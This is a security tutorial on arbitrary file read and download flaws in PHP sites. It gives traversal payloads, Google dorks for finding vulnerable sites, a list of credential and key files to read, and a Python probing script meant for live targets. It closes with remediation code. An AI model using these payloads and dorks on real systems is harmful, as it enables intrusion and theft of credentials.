Arbitrary file viewing and downloading vulnerabilities
Vulnerability introduction
For business reasons, many websites need to offer a file viewing or file downloading function. If the file a user views or downloads is not restricted, a malicious user can view or download any file on the server, including sensitive ones. This is the arbitrary file viewing and downloading vulnerability.
Exploitation conditions
* There is a function that reads a file
* The path of the file to read is user-controllable and is either not validated or validated laxly
* The file content is returned to the user (displayed or offered as a download)
Vulnerability impact
Download arbitrary server files, such as script source code, service configuration and system configuration files, credentials and so on.
The downloaded source code can then be audited to find further, more exploitable vulnerabilities.
Arbitrary file read
The vulnerable code typically takes one of the following forms. The file name is hard-coded here; the bug appears when $filename is taken from a request parameter (for example $_GET['file']) without validation:
<?php
// readfile() sends the file contents straight to the output
$filename = "test.txt";
readfile($filename);
?>
<?php
// fopen()/fread(): read the whole file into memory, then echo it
$filename = "test.txt";
$fp = fopen($filename,"r") or die("Unable to open file!");
$data = fread($fp,filesize($filename));
fclose($fp);
echo $data;
?>
<?php
// file_get_contents() returns the whole file as a string
$filename = "test.txt";
echo file_get_contents($filename);
?>
Arbitrary file download
Direct link download:
<a href="http://www.xx.com/a.zip">Download</a>
Download with header():
<?php
$filename = "uploads/201607141437284653.jpg";
header('Content-Type: image/jpeg');
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Length: '.filesize($filename));
readfile($filename);   // send the file body after the headers
?>
Exploitation payloads
readfile.php?file=/etc/passwd
readfile.php?file=../../../../../../../../etc/passwd
readfile.php?file=../../../../../../../../etc/passwd%00
The %00 (null byte) variant truncates a suffix that the code appends to the parameter, such as ".txt"; it only works on PHP versions before 5.3.4, which reject null bytes in file paths.
Google dorks
inurl:"readfile.php?file="
inurl:"read.php?filename="
inurl:"download.php?file="
inurl:"down.php?file="
and so on...
Finding the vulnerability
Use Google hacking (the dorks above) or a web vulnerability scanner.
From the link, look for URLs of the form:
• readfile.php?file=***.txt
• download.php?file=***.rar
From parameter names, look for parameters such as:
• &RealPath=
• &FilePath=
• &filepath=
• &Path=
• &path=
• &inputFile=
• &url=
• &urls=
• &Lang=
• &dis=
• &data=
• &readfile=
• &filep=
• &src=
• &menu=
and, for Java web applications, traversal that reaches the application metadata directories:
• META-INF
• WEB-INF
Sensitive files worth reading:
Windows:
C:\boot.ini //reveals the system version
C:\Windows\System32\inetsrv\MetaBase.xml //IIS configuration file
C:\Windows\repair\sam //backup of the SAM database made at installation, holding the initial passwords
C:\Program Files\mysql\my.ini //MySQL configuration
C:\Program Files\mysql\data\mysql\user.MYD //MySQL user table, including the root password hash
C:\Windows\php.ini //PHP configuration
C:\Windows\my.ini //MySQL configuration
...
Linux:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/known_hosts
/etc/passwd
/etc/shadow
/etc/my.cnf
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/self/fd/[0-9]* //open file descriptors of the current process
/proc/mounts //mounted file systems
/proc/config.gz //kernel build configuration
Verifying the vulnerability
• index.php?f=../../../../../../etc/passwd
• index.php?f=../index.php
• index.php?f=file:///etc/passwd
Note: when the value of parameter f is a PHP file, if the file is parsed (executed) the bug is a file inclusion vulnerability;
if the source code is displayed or a download is offered, it is a file viewing and downloading vulnerability.
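The probing and classification logic behind the URLs above, as an added example in Python (not code from the original page): it builds the payload variants listed in the exploitation and verification sections and labels a response the way the note does, distinguishing an arbitrary file read from a file inclusion. The response bodies used are constructed; the SIGNATURES table, traversal_payloads, classify and the comparison against a "not found" baseline response are this example's own names and design.

```python
import re
from urllib.parse import quote

# Content signatures for files the page lists, used to recognise a hit.
SIGNATURES = {
    "passwd":   re.compile(rb"^root:[^:\n]*:0:0:", re.M),
    "shadow":   re.compile(rb"^root:[^:\n]*:\d+:\d*:\d*:\d*:", re.M),
    "boot.ini": re.compile(rb"\[boot loader\]", re.I),
    "my.cnf":   re.compile(rb"^\[mysqld\]", re.M),
}


def traversal_payloads(target, max_depth=8):
    """Candidate values for the file parameter, as in the page's exploit URLs:
    the absolute path, a file:// URL, ../ chains of increasing depth, and each
    of those with a trailing NUL (for code that appends an extension).
    The NUL truncates the path only on PHP < 5.3.4; newer versions reject it."""
    rel = target.lstrip("/").replace("\\", "/")
    plain = [target, "file://" + target]
    plain += ["../" * d + rel for d in range(1, max_depth + 1)]
    return plain + [p + "\x00" for p in plain]


def encode(payload):
    """URL-encode a payload for the query string, keeping / and : readable."""
    return quote(payload, safe="/:")


def requested_name(payload):
    """Base name of the file a payload asks for, ignoring traversal and NUL."""
    p = payload.split("\x00")[0].replace("\\", "/")
    return p.rstrip("/").rsplit("/", 1)[-1]


def classify(payload, body, headers=None, baseline=b""):
    """Label a response using the page's rule: recognised file content or PHP
    source (or an attachment download) means arbitrary file read/download; a
    PHP file that comes back executed, i.e. different from the not-found
    baseline but without its source, points to file inclusion instead."""
    headers = headers or {}
    name = requested_name(payload)
    if body == baseline:
        return "not vulnerable"
    sig = SIGNATURES.get(name)
    if sig and sig.search(body):
        return "arbitrary file read"
    if name.endswith(".php"):
        if b"<?php" in body or "attachment" in headers.get("Content-Disposition", ""):
            return "arbitrary file read"
        return "file inclusion"
    return "inconclusive"


if __name__ == "__main__":
    # Constructed responses standing in for a real target.
    passwd = b"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1::/usr/sbin:/usr/sbin/nologin\n"
    for p in traversal_payloads("/etc/passwd", max_depth=2):
        print("readfile.php?file=" + encode(p))
    print(classify("../../../etc/passwd", passwd))
    print(classify("../index.php", b"<?php include 'config.php'; ?>"))
    print(classify("../index.php", b"<html>Welcome</html>", baseline=b"File not found"))
```

Run it against a live target by substituting the HTTP response body and headers for each encoded payload; the baseline is the response for a file name that certainly does not exist, which is what lets an executed PHP page be told apart from a plain "not found".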
Remediation
* Filter "." (dots) so that the URL cannot traverse to parent directories; stripping "../" once is bypassable (for example "....//"), so reject the request outright rather than sanitizing it
* Use a strict regular expression, or a whitelist of allowed file names, to validate the format of the user-supplied parameter
* Configure open_basedir in php.ini to restrict the directories PHP file functions may access
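The remediation list, as an added example (not code from the page): a Python version of the page's readfile() handler beside a hardened one that applies the points above, rejecting traversal characters, null bytes and anything outside a strict whitelist, then canonicalizing the path and checking that it is still inside the upload directory, which is the containment open_basedir enforces for PHP. The sandbox directory, file names and function names are this example's own assumptions; in PHP the containment step is realpath() plus a prefix comparison against the allowed directory. The symlink case shows why the whitelist alone is not enough.

```python
import os
import re
import tempfile

# Constructed sandbox so the demo runs offline: a fake web root with an
# uploads directory, a secret file outside it, and a symlink pointing at it.
ROOT = tempfile.mkdtemp()
UPLOADS = os.path.join(ROOT, "www", "uploads")
os.makedirs(UPLOADS)
with open(os.path.join(UPLOADS, "report.txt"), "w") as fh:
    fh.write("quarterly report\n")
os.makedirs(os.path.join(ROOT, "etc"))
with open(os.path.join(ROOT, "etc", "passwd"), "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n")
os.symlink(os.path.join(ROOT, "etc", "passwd"), os.path.join(UPLOADS, "link"))


def vulnerable_download(name):
    """Equivalent of the page's handler: readfile() on the raw parameter."""
    with open(os.path.join(UPLOADS, name), "rb") as fh:
        return fh.read()


# Whitelist of what an uploaded file name may look like: no separators,
# no NUL, no leading dot (so ".." and dotfiles never pass).
ALLOWED_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]*")


def safe_download(name):
    """Hardened handler: validate the name, then confirm the canonical path
    is still inside UPLOADS (catches '..' chains and symlinks alike)."""
    if not ALLOWED_NAME.fullmatch(name):
        raise PermissionError("rejected file name: %r" % name)
    base = os.path.realpath(UPLOADS)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes upload directory: %r" % name)
    with open(target, "rb") as fh:
        return fh.read()


def is_rejected(name):
    """True when the hardened handler refuses the request."""
    try:
        safe_download(name)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_download("../../etc/passwd"))   # traversal leaks the secret
    print(vulnerable_download("link"))                # so does the symlink
    print(safe_download("report.txt"))
    for bad in ("../../etc/passwd", "....//....//etc/passwd",
                "report.txt\x00.jpg", "/etc/passwd", "link"):
        print(repr(bad), "rejected:", is_rejected(bad))
```

The whitelist stops every payload from the exploitation section, but only the realpath() plus commonpath() step stops "link", a perfectly valid name that resolves outside the directory; this is why the regex and the canonical-path check are both needed.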